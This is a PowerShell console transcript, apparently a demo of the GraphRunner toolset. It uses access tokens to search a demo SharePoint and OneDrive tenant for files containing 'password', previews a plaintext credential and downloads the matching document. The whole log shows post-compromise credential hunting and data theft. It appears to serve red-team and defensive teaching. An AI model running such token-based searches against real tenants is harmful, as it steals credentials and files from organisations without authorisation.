PS C:\Users\beau\Desktop\GraphRunner\GraphRunner_Outputs> Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm "password"
[*] Using the provided access tokens.
[*] Found 3 matches for search term password
Result [0]
File Name: Passwords.docx
Location: https://tyrellcorporation.sharepoint.com/Dark Magician Documents/Passwords.docx
Created Date: 2023-08-17T01:34:37Z
Last Modified Date: 2023-08-17T01:35:40Z
Size: 17.14 KB
File Preview: Login Info Pass:DarkArts123<ddd/>
DriveID & Item ID: b!Gazi8NtGNEuZqwngAkhgw1yVDKVlrcNBvtYsRuKjeosk7WyvlUAkQpJ6eftJ-kxY\:01O2EFLFMWIAMPAMFGM5DIJR2F2AILV4LO
================================================================================
Result [1]
File Name: Super secret document with all my passwords.docx
Location: https://tyrellcorporation-my.sharepoint.com/personal/deckard_tyrellcorporation_io/Documents/Super secret document with all my passwords.docx
Created Date: 2023-08-15T18:13:59Z
Last Modified Date: 2023-08-15T18:14:44Z
Size: 9.57 KB
File Preview: <ddd/><c0>passwords</c0> <ddd/>
DriveID & Item ID: b!8zEWMqtjZ0qscUfvi2iWzADfKGwrRd5KmN-N0SymLNA7KPaLxCftT5UexaA-ny-5\:01R3G3I3YZAEZDZAOC6ZD3IWPAXEYXJZJK
================================================================================
Result [2]
File Name: javadb.jsp
Location: https://tyrellcorporation.sharepoint.com/sites/TestTeamSite/Shared Documents/Secret Plans/Test Sensitive Data/javadb.jsp
Created Date: 2023-09-03T21:14:32Z
Last Modified Date: 2023-09-03T21:14:32Z
Size: 623 Bytes
File Preview: <ddd/><c0>password</c0> Statement stmt = con.createStatement(); ResultSet rs = stmt.executeQuery("SELECT<ddd/>
DriveID & Item ID: b!UZKcPDJOak6rlVu_8sqLHrL37OSkA7tNiIu6hH3cVmYli4rws4usRomUi9sy-cG4\:01F276Q3RUKUFYFCZG7VH3LWY5PDFNTBHL
================================================================================
[*] Do you want to download any of these files? (Yes/No)
yes
[*] Enter the result number(s) of the file(s) that you want to download. Ex. "0,10,24"
0
[*] Now downloading Passwords.docx
[*] Do you want to download any more files? (Yes/No)
no
[*] Quitting...